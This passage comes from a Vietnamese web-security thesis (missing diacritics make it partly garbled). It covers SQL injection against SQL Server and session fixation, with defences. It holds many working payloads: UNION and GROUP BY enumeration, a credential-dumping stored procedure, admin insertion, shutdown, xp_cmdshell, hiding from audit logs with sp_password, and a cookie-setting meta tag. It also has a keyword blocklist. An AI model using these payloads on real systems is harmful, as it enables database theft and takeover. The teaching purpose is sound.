Lnh SELECT c dng ly thng tin t csd liu. Thng thng v tr
c thc chn thm vo mt mnh SELECT l sau WHERE. c th tr
v nhiu dng thng tin trong bng, thay i iu kin trong mnh WHERE
bng cch chn thm UNION SELECT.
V d 6.III.4-1:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &
tName & UNION SELECT tkPassword from User
Cu lnh trn tr v mt tp kt qu l s kt h p gia tkUsername vi
tkPassword trong bng User.
Ghi ch:
S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct
trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng
nhau v cng kiu.
Nh vo li c php tr v sau khi chn thm cu lnh UNION m c th bit
kiu ca mi trng.
8/14/2019 LVCNTT-BaoMatWeb
66/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 63-
Sau y l nhng v dc thc hin khi khng bit ni dung csd liu da
vo HAVING, GROUP BY, UNION:
V d 6.III.4-2: Nhc li cu truy vn cn ng nhp:
SQLQuery= SELECT tkUsername,tkPassword FROM User WHERE
tkUsername= & strUsername & AND Password= & tkPassword
&
u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu
iu kin having , nh v d sau:
Gi tr nhp vo:
Username: having 1=1--
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'User.tkUsername' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BYclause.
Nhvo li pht sinh ny m bit c bng s dng trong cu truy vn l User
v trong bng tn ti mt trng tn l tkUsername.
Sau s dng GROUP BY:
V d 6.III.4-3:
Username: group by User.tkUsername having 1=1--
8/14/2019 LVCNTT-BaoMatWeb
67/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 64-
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]
Column'User.tkPassword'is invalid in the select list because it
is not contained in either an aggregate function or the GROUP BY
clause.
Nh vy tkPassword l mt trng ca bng User v c s dng trong cu truy
vn.
Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng
User tham gia vo cu truy vn.Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim
tra kiu ca tng trng trong bng. Lc ny UNION c s dng:
V d 6.III.4-4:
Username:union select sum(tkUsername) from User
Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i sphi l kiu s.Nu i s khng l kiu s th pht sinh li nh sau:
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or
average aggregate operation cannot take a varchar data type as
an argument.
Nh vy vi thng ip li nh trn th tkUsername chc chn phi l kiuvarchar.
8/14/2019 LVCNTT-BaoMatWeb
68/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 65-
Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng.
Sau khi nhn y trng tin trn th hacker d dng t thm thng tin vo
bng User.
V d 6.III.4-5:
Username:; insert into User(tkUsername,tkPassword) values
(admin, )--
Hacker thm ni dung nh V d 6.III.4.2.4 by gitrthnh ngi qun tr mng
m khng cn mt khu chng thc.
V d 6.III.4-6: minh ho mt cng on s gip hackerc ht thng tin trong
bng User:
Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng
tkUsername v tkPassword trong bng User thnh mt chui vo mt bng
mi l foo c mt trng l ret bng on m sau:
create proc test
as
begin
declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
select @ret as ret into foo
end
Thc thi cu lnh bng cch nhp vo form.
Username:;Create proc test as begin declare @ret
varchar(8000) set @ret=: select @ret=@ret+'
8/14/2019 LVCNTT-BaoMatWeb
69/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 66-
'+tkUsername+'/'+tkPassword from User select @ret as ret into
foo
Bc 2: Gi Stored procedure
Sau khi to c stored procedure nh trn, thc hin li gi hm:
Username:;exec test
Bc 3: Dng UNION xem ni dung bng foo
Username:;select ret,1 from foo union select 1,1 from foo
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error convertingthe varchar value ':
admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu'
to a column of data type int.
Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn
tkUsername v mt khu tkPassword.
Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:
Username: ; drop table foo--
V d 6.III.4-7: Cn y l mt cch khc xc nh ni dung ca bng User,
cn mt phng php tm kim thng tin nh sau: Bc 1:
Tm tun t tng dng trn bng User
Username:union select 1,1
8/14/2019 LVCNTT-BaoMatWeb
70/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 67-
hoc :
Username:union select min(tkUsername),1 from User where
tkUsername> a--
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the varchar value 'admin' to a column of data type
int.
Ngi u tin trong bng User l admin.
Bc 2:
bit cc gi tr tip theo, nhp chui sau:
Username:;select min(tkUsername),1 from User where
tkUsername> adminunion select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting
the varchar value 'nhimmap' to a column of data type int.
Bc 3:
Thc hin nh bc 2 cho ra kt qu l tng dng vi trng tkUsername
trong bng User.
8/14/2019 LVCNTT-BaoMatWeb
71/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 68-
Bc 4:
bit thm v tkPasswork, c th thc hin nh sau:
Username:;select tkPassword,1 from User where tkUsername=
adminunion select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting
the varchar value 'passOfAdmin' to a column of data type int.
bit thng tin v cc bng, ct trong csd liu, c th truy vn bng n
bng h thng INFORMATION_SCHEMA.TABLES.
V d 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn
server. Trng TABLE_NAME cha tn ca mi table trong csd liu.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='User'
Cu lnh trn c s dng bit thng tin v ct trong bng.
Ngoi ra cn c th dng UNION bit cc bin mi trng ca SQL Server.
8/14/2019 LVCNTT-BaoMatWeb
72/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 69-
V d 6.III.4-9: bit ng dng ang chy trn Server no, c th xc nh bng
cch sau:
Username:;select @@SERVERNAME union select 1
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'KHOAI_NGU' to a column of
data type int.
III.5. Tn cng da vo lnh INSERT
T kho INSERT dng a thng tin vo c s d liu. Thng thng cu
lnh INSERT c dng trong cc trng hp nh: thng tin ng k ngi s
dng, guestbookv..v
Kthut ;, -- c dng nh tng dng vi cu lnh SELECT, phi m
bo ng s lng v kiu gi trc nhp vo nhm trnh li v c php (nukhng xc nh c kiu d liu c th nhp tt c l s).
V d 6.III.5-1:
SQLString= INSERT INTO User VALUES ( & strUsername & , &
strName& , & strPassWord & ,& strLimitSize & )
8/14/2019 LVCNTT-BaoMatWeb
73/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 70-
III.6. Tn cng da vo STORED PROCEDURE
Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc
tp trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhinhacker vn c th li dng nhng Stored Procedure tn cng vo h thng.
V d 6.III.6-1: Stored procedure sp_login gm hai tham s l username v
password. Nu nhp:
Username: nhimmap
Password: ;shutdown--
Lnh gi stored procedure nh sau:
exec sp_login nhimmap,;shutdown--
Lnh shutdown thc hin dng SQL Server ngay lp tc.
III.7. Nng cao
III.7.1. Chui k tkhng c du nhy n:Nhng nh lp trnh c th bo vng dng ca h bng cch loi b tt c
du nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2
du nhy.
V d 6.III.7.1-1:
Function escape (input)
Input=replace(input, , )
escape=input
end function
8/14/2019 LVCNTT-BaoMatWeb
74/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 71-
R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu
mun to ra mt chui gi tr m khng dng cc du nhy, c th dng hm
char() nh v d sau:
V d 6.III.7.1-2:
INSERT into User VALUES(666, char(0x63) +char(0x68)
+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68)
+char(0x72) +char(0x69) +char(0x73),0xffff)
V d 6.III.7.1-3 trn tuy l mt cu truy vn khng c du nhy n no
nhng n vn c th insert chui vo bng, v tng ng vi:
INSERT into User VALUES( 666,chris,chris,255)
Hacker cng c th chn username , password l s trnh du nhy nh v
d sau:
V d 6.III.7.1-4:
INSERT into User VALUES( 667,123,123,0xffff)
SQL server s tng chuyn t s sang chui.
III.7.2. Tn cng 2 tng
Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn
on m SQL .
V d 6.III.7.2-1: ng k account trong ng dng, nhp username nh sau:
Username: admin'
Password: passofadmin
8/14/2019 LVCNTT-BaoMatWeb
75/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 72-
ng dng s thay th du nhy, kt qu trong cu insert s nh sau:
INSERT into User VALUES(123, 'admin''--', 'password',0xffff)
(nhng trong csd liu s lu l admin--)
Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m
ASP c thit km bo rng ngi s dng phi nhp ng mt khu c
trc khi nhp mt khu mi. on m nh sau:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username
+ "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
Cu truy vn thit lp mt khu mi nh sau:
sql = "update users set password = '" + newpassword + "' where
username= '" + rso("username") + "'"
rso(username) chnh l gi tr username c c cu truy vn login v n l
admin--
Cu truy vn lc ny nh sau:
8/14/2019 LVCNTT-BaoMatWeb
76/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 73-
update users set password = 'password' where username =
'admin'--'
Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh.
y l 1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c
s dng cch loi b d liu. Gii php tt nht l loi b nhng gi tr li
hn l chnh sa li. Nhng c mt vn l c mt s nhp d liu (nh
nhp tn) cho php nhng k t ny. V d: OBrien.
Cch tt nht gii quyt vn ny l khng cho php nhp du nhy n.
Nu iu ny khng th thc hin c , th loi b v thay th nh trn.
Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo
cu truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim
sot mt cch cht ch.
Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng
cch gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s
kiu tn cng khng th thc hin c nhng vn c ch h hacker li
dng.
V d 6.III.7.2-2:
Gi s c username v password u b gii hn ti a l 16 k t. Nhp:
Username: aaaaaaaaaaaaaaa
Password :; shutdown--
8/14/2019 LVCNTT-BaoMatWeb
77/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 74-
ng dng s thay th mt du nhy n bng hai du nhy n nhng do
chiu di chui b gii hn ch l 16 k t nn du nhy n va c thm s
b xo mt. Cu lnh SQL nh sau:
Select * from users where username=aaaaaaaaaaaaaaa and
password=; shutdown
kt qu l username trong cu lnh c gi tr l:
aaaaaaaaaaaaaaa and password=
III.7.3. Trnh skim sot:
SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX,
cho php ghi nhn nhiu s kin xy ra trong csd liu. c bit l cc s
kin T-SQL, ghi nhn li tt c cc cu lnh SQL thc hin trn Server. Nu
ch kim sot c bt th tt c cc cu truy vn SQL ca hacker cng b
ghi nhn v nh m mt ngi qun tr c th kim sot nhng g ang xy
ra v nhanh chng tm ra c gii php. Nhng cng c mt cch chng
li iu ny, bng cch thm dng sp_password vo cu lnh T-SQL, v khi
gp chui ny th vic kim tra s ghi nhn nh sau:
-- sp_password was found in the text of this event.
-- The text has benn replaced with this comment for security
reasons.
ngay c khi sp_password xut hin trong phn ch thch.
V th du tt c cu truy vn tn cng, ch cn n gin l thm
sp_password vo sau -- nh sau:
8/14/2019 LVCNTT-BaoMatWeb
78/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 75-
Username:admin--sp_password
III.7.4. Dng Extended Stored Procedure
III.7.4.1. Dng Extended Stored Procedure c sn trong h thng
SQL Server
Nu ci SQL Server ch mc nh th SQL Server chy trn nn
SYSTEM, tng ng mc truy cp Windows. C th dng
master..xp_cmdshell thi hnh lnh t xa:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Th dng du nhy i (") nu du nhy n (') khng lm vic.
Di y l mt s extended stored procedure m hacker thng hay s
dng thc thi nhng cu lnh xem ni dung thng tin trong my nn
nhn:
Xp_availablemedia hin th nhng a hin hnh trn my
Xp_dirtree hin th tt c cc th mc k c th mc con
Xp_loginconfig Ly thng tin v ch bo mt trn server
Xp_makecab cho php ngi s dng to cc tp tin lu tr trn
Server (hay bt c tp tin no m server c th truy
8/14/2019 LVCNTT-BaoMatWeb
79/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 76-
n
III.7.4.2. Dng Extended Stored Procedure tto
Extended stored procedure API l mt chng trnh c mt nhim vn
gin l to ra mt DLL extended stored porcedure cha ng on m nguy
him. a tp tin DLL ln Server c th dng cc cu lnh, hoc cc kthut giao tip khc nhau c thc hin tng, nh l HTTP download v
FTP script.
Mt khi t p tin DLL tn ti trn my ch, th hacker c th to mt
extended stored procedure bng dng lnh sau :
V d 6.III.7.4.2-1:sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll
Sau c th thc thi n nh l thc thi extended stored procedure thng
thng :
exec xp_webserver
Khi thc hin xong, c th xo bng lnh sau:sp_dropextendedproc xp_webserver
Xp_ntsec_enumdomain lit k nhng domain m server c th truy vn.
Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.
8/14/2019 LVCNTT-BaoMatWeb
80/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 77-
III.7.4.3. Nhp tp tin vn bn vo bng
Dng lnh bulk insert, nhp d liu t mt tp tin vn bn vo trong mt
bng tm thi.
V d 6.III.7.4.3-1:V d to mt bng n gin nh sau:
create table foo (line varchar(8000))
Sau chy cu lnh bulk insert chp d liu t tp tin vo bng
V d 6.III.7.4.3-2:
bulk insert foo from c:\inetpub\wwwroot\process_login.asp
Ni dung trang process_login.asp c th ly v bng cch dng nhng k
thut nh trong V d 6.III.7.4-3.
IV. CCH PHNG CHNG
Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL trc
khi c s dng.
Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic
phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi
dng bng cch thay th nhng li thng bo bng 1 trang do ngi pht trinthit k mi khi li xy ra trn ng dng.
Kim tra kgi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v..
8/14/2019 LVCNTT-BaoMatWeb
81/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 78-
Hy loi b cc k t meta nh ',",/,\,; v cc k t extend nh NULL, CR, LF, ...
trong cc string nhn c t:
o d liu nhp do ngi dng trnh
o cc tham s t URL
o cc gi tr t cookie
i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hin cu
truy vn SQL, hoc dng ISNUMERIC chc chn n l mt s integer.
Dng thut ton m ho d liu
IV.1. Kim tra dliu
Kim tra tnh ng n ca d liu l 1 vn phc tp v thng cha c
quan tm ng mc trong cc ng dng. Khuynh hng ca vic kim tra tnh
ng n ca d liu khng phi l ch cn thm mt s chc nng vo ng dng,
m phi kim tra mt cch tng qut nhanh chng t c mc ch.
Nhng tm tt sau y s bn v vic kim tra tnh ng n ca d liu, cng vi
v d mu minh ho cho vn ny.
C ba gii php tip cn vn ny:
1) C gng kim tra v chnh sa lm cho d liu hp l.
2) Loi b nhng d liu bt hp l.
3) Ch chp nhn nhng d liu hp l
Gii php 1: kh thc hin
Th nht, ngi lp trnh khng cn thit phi bit tt c d liu bt hp l,
bi v nhng dng d liu bt hp l rt a dng.
8/14/2019 LVCNTT-BaoMatWeb
82/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 79-
Th hai, l vn ca trng hp b tn cng 2 tng (second-oder SQL
injection) trong vic ly d liu t h thng ra.
Gii php 2:b v hiu trong cc trng hp nh gii php 1 l do :
D liu bt hp l lun lun thay i v cng vi vic pht trin cc kiu tn
cng mi.
Gii php 3: tt hn hai gii php kia, nhng s gp mt s hn ch khi ci
t.
Cch bo mt tt nht l kt hp c gii php 2 v 3. Mt v d cho s cn
thit kt hp 2-3 l du ni gia h v tn Quentin Bassington-Bassington
phi cho php du gch ngang trong bnh ngha d liu hp l, nhng chui
k t -- l mt chui k tc bit trong SQL server.
V d nu c b lc :
Lc b nhng d liu bt hp l nh --,select v union
Mt hm kim sot loi b du nhy n th c thi ph nh sau.
union select @@version--
Mt s cch ci t cc chc nng kim tra d liu cbn
Cch 1: Thay th du nhy n:
function escape( input )
input = replace(input, "'", "''")
escape = input
end function
8/14/2019 LVCNTT-BaoMatWeb
83/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 80-
Cch 2: T chi d liu bt hp l
function validate_string( input )
known_bad = array( "select", "insert", "update",
"delete", "drop","--", "'" )
validate_string = true
for i = lbound( known_bad ) to ubound( known_bad )
if ( instr( 1, input, known_bad(i), vbtextcompare )
0 )
then
validate_string = false
exit function
end if
next
end function
Cch 3: Ch chp nhn d liu hp l
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
8/14/2019 LVCNTT-BaoMatWeb
84/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 81-
IV.2. Kho cht SQL Server (SQL Server Lockdown)
Lun vn cng gii thiu mt phng php bo mt mc qun tr csd
liu.
y l mt danh sch cc cng vic cn lm bo v SQL server:
Xc nh cc phng php kt ni n server:
o Dng tin ch Network Utility kim tra rng ch c cc th vin mng
ang dng l hoat ng.
Kim tra tt c cc ti khon c trong SQL Servero Ch to ti khon c quyn thp cho cc ng dng
o Loi b nhng ti khon khng cn thit
o m bo rng tt c ti khon c mt mt khu hp l,
Kim tra cc i tng tn ti
o Nhiu extended stored procedure c th c xo b mt cch an ton.
Nu iu ny c thc hin, th cng nn xem xt vic loi b lunnhng tp tin .dll cha m ca cc extended stored procedure
o Xo b tt c csd liu mu nh northwind v pubs
o Xa cc stored procedure khng dng nh: master..xp_cmdshell,
xp_startmail, xp_sendmail, sp_makewebtask
Kim tra nhng ti khon no c th truy xut n nhng i tng no
o i vi nhng ti khon ca mt ng dng no dng truy xut csd liu th chc cp nhng quyn hn cn thit ti thiu truy xut
n nhng i tng n cn dng.
8/14/2019 LVCNTT-BaoMatWeb
85/169
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
-Trang 82-
Kim tra lp sa cha ca server
o C mt s cch tn cng nh buffer overflow, format string thng
ch n lp bo v ny.
Kim tra cc phin lm vic trn server
Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp
trong SQL Server Security.
Nhn xt:- Qua chng 6 ny, cng thy rng vic kim tra d liu trc khi x l l cn thit.
- ng dng ngoi vic kim tra tnh ng n ca d liu, cn m ha d liu ngay
bn trong csd liu v khng cho xut trang Web li, bo ni dung li c php
SQL hacker khng th thu thp thng tin csd liu.
- Song song l cng vic ca ngi qun tr mng.
8/14/2019 LVCNTT-BaoMatWeb
86/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 83-
Chng 7
CHIM HU PHIN LM VICNi dung:
I. Tng quan v SessionID
II. n nh phin lm vic
III. nh cp phin lm vic
8/14/2019 LVCNTT-BaoMatWeb
87/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 84-
CHNG 7: CHIM HU PHIN LM VIC
I. TNG QUAN V SESSIONID
Nh cp n Session trong chng 2 phn III, session dng lu tr trng
thi lm vic gia trnh duyt v trnh ch. Session ID c th c lu tr trong
cookie hay c nhng vo a ch URL hay trong bin n ca form.
Mi kiu lu tru c u v khuyt im, nhng qua thc t cookie vn l la chn
tt nht, v l phng php an ton nht.
Thng thng, sau khi ngi dng c chng thc da trn nhng thng tin c
nhn nh tn/mt khu, session ID c xem nh mt mt khu tnh tm thi cho
nhng ln yu cu tip theo. iu ny khin cho Session ID l mc tiu ln cho
nhng hacker. Trong nhiu trng hp, hacker ginh c session ID hp l ca
ngi dng t t nhp vo phin lm vic ca h.
XSS cng l mt cch tn cng c th chim c session ID lu tr trong cookie.
Cch tn cng ny gi l session hijacking.
Tn cng vo mt phin lm vic thng c thc hin theo 2 kiu chnh sau:
n nh phin lm vic
nh cp phin lm vic
8/14/2019 LVCNTT-BaoMatWeb
88/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 85-
II.N NH PHIN LM VIC
Trong kiu tn cng n nh mt phin lm vic, hackern nh sn session ID cho
nn nhn trc khi hng nhp vo h thng. Sau , hacker s s dng session IDny buc vo phin lm vic ca nn nhn .
Tm tt qu trnh tn cng:
Bc 1: Thit lp session ID.
H thng qun l session theo 2 hng:
+ Hng t do: chp nhn bt k mt session ID, nu cha tn ti session th to
mi mt session ID+ Hng gii hn: ch chp nhn session ID no ng k trc .
Vi h thng hng t do hacker ch cn thit lp mt session ID bt k, nh v
sau s dng li session ID ny. hng gii hn, hacker phi ng k mt
session ID vi ng dng.
Ph thuc vo qui trnh qun l phin lm vic m hacker lu tr thi gian sng
ca phin lm vic cho n khi nn nhn ng nhp vo h thng. Thng thngmt phin lm vic khng tn ti v hn nh. H thng s tng hy bphin
lm vic nu n khng thc hin mt thao tc no (thi gian nhn ri ) hoc ht
hn nh.
Do bc 1a l k tn cng s bo tr phin lm vic bng cch gi yu cu n
server.
8/14/2019 LVCNTT-BaoMatWeb
89/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 86-
Hnh 7.II-1: Slc qu trnh tn cng ngi dng bng kthut n nh session
Bc 2: Gi ID ny n trnh duyt nn nhn.
Hacker gi session ID va to n ngi dng v vic trao i ID session cn ty
vo ng dng m c th qua URL, bin n form hay cookie. Cc cch tn cng
thng dng gm:
o Tn cng session ID trn tham s URL.
o Tn cng session ID bng bin n form.
o Tn cng session ID trong cookie.
Bc 3: t nhp vo phin lm vic ca nn nhn.
Sau khi nn nhn ng nhp vo h thng qua session ID c chnh sn v
cha thot khi ng dng, hacker lc ny bt u dng session ID bc vo
phin lm vic ca nn nhn.
8/14/2019 LVCNTT-BaoMatWeb
90/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 87-
Hnh 7.II-2: M t chi tit qu trnh thc hin tn cng ngi dng
bng kthut n nh phin lm vic.
Tip theo lun vn s trnh by v cc cch tn cng session ID trong bc 2.
8/14/2019 LVCNTT-BaoMatWeb
91/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 88-
II.1. Tn cng Session ID trn tham s URL
Hacker gi mt lin kt yu cu ngi dng ng nhp vo h thng my ch vi
sessionID c n nh sn trn URL.
V d 7.II.1-1:
http://online.worldbank.com/login.jsp?sessionid=1234
Hnh 7.II.1-1: Tn cng thng qua tham s URL
1. Hacker m dch v trc tuyn ca ngn hng thng qua a ch
online.worldbank.com
2. Nhn c mt session ID t trnh ch xc nh phin lm vic ca
hacker. V d session ID c gi tr l 1234.
3. Sau hacker s tm cch gi mt lin kt n mt ngi dng no c ti
khon trong ngn hng ny. Nhng lin kt thng l dn n trang ng
nh p vo ti khon trong ngn hng v d lin kt l
http://online.workbank.com/login.jsp?sessionid=1234, la ngi dng lm
vic trong phin lm vic ca hackerkhi ngi dng nhn c lin kt ny,
8/14/2019 LVCNTT-BaoMatWeb
92/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 89-
4. Ngi dng b mc la v mng dng Web bng lin kt ca hacker. Do
c session ID (ca hacker) nn trnh ch s khng to mt session ID mi.
5. Ngi dng vn tip tc ng nhp vi thng tin ca mnh qun l ti
khon.
6. Khi hacker s vo ti khon ca ngi dng m khng cn phi ng nhp
v c cng phin lm vic.
Nhn xt: Cch tn cng ny i hi ng dng phi to session ID ngay khi ngi
dng s dng ng dng. Dbpht hin bi ngi dng.
II.2. Tn cng Session ID trong bin n form
Kthut ny cng tng t nh kthut bin n form, ngha l sau khi hacker xem
m HTML ca trang Web, nhn thy session ID c t trong bin n form,
hacker s gi mt sessionID cng trn URL n ngi dng hoc mt trang Web
ging trang ch nhng vi bin n form mang gi tr n nh sn.
Nhn xt: Phng php ny cng khng kh thi v cng d b pht hin nh
phng php trn.
II.3. Tn cng Session ID trong cookie
Bng vic li dng cookie, hacker c ba cch a mt session ID n trnh
duyt ca nn nhn:
S dng ngn ng kch bn( Javascript, VBscript..) thit lp mt cookie
trong trnh duyt ca nn nhn.
S dng th thit lp thuc tnh Set-Cookie
S dng Set-Cookie ca HTTP header tr li
8/14/2019 LVCNTT-BaoMatWeb
93/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 90-
C th l:
a) Thit lp mt cookie trn trnh duyt bng ngn ng kch bn:
Hu ht trnh duyt u h trcc ngn ng kch bn thc thi trn trnh duyt nh
Javascript, VBScript. C hai ngn ng ny c th thit lp mt cookie cho trnh
duyt bng cch thit lp gi tr document.cookie.
V d 7.II.3-1:
http://online.workbank.com/document.cookie=
sessionid=1234; domain= .workbank.com;.idc
Bn cnh , hacker c th thit lp thi gian sng cho cookie, domain cookie
v cch ny ph hp vi nhng h thng hng t do. V d domain no thuc
.workbank.com u c thc c gi tr cookie ny.
b) Dng th vi thuc tnh Set-Cookie:
ng dng cng c th thit lp cookie cho trnh duyt bng th trong
HTML.
V d 7.II.3-2:
< meta http-equiv= Set-Cookie content=sessionid=1234>
Meta tag Injection (Thm th meta):
Vi nhng h thng kim tra i s vi th th kthut XSS gp nhiu
kh khn, do thm th l phng php kh hu hiu cho php thao
tc trn cookie. Thng thng th c t gia th
8/14/2019 LVCNTT-BaoMatWeb
94/169
Khoa CNTT
Chng 7: Chim hu phin lm vic
-Trang 91-
nhng n vn c th c x l nu t bt c u trong
trang HTML.
V d 7.III-3:
http://online.workbank.dom/.idc
Phng php ny chim u th hn XSS ch khng b ph hy trong IE ( khng
cho php thao tc cc ngn ng kch bn trn trnh duyt), ngoi tr th
c) Thit lp cookie dng thuc tnh Set-Cookie trong header HTTP response:
Cch ny thit lp mt cookie cho trnh duyt bng cch dng Set-Cookie trong
header HTTP thng qua kthut tn cng DNS server,
II.4. Cch phng chngTrc ht cng cn ni r rng vic phng chng kiu tn cng n nh session
ID ny khng thuc trch nhim ca trnh ch Web server, v trnh ch ch cung
cp API qun l phin lm vic cho ng dng. V th,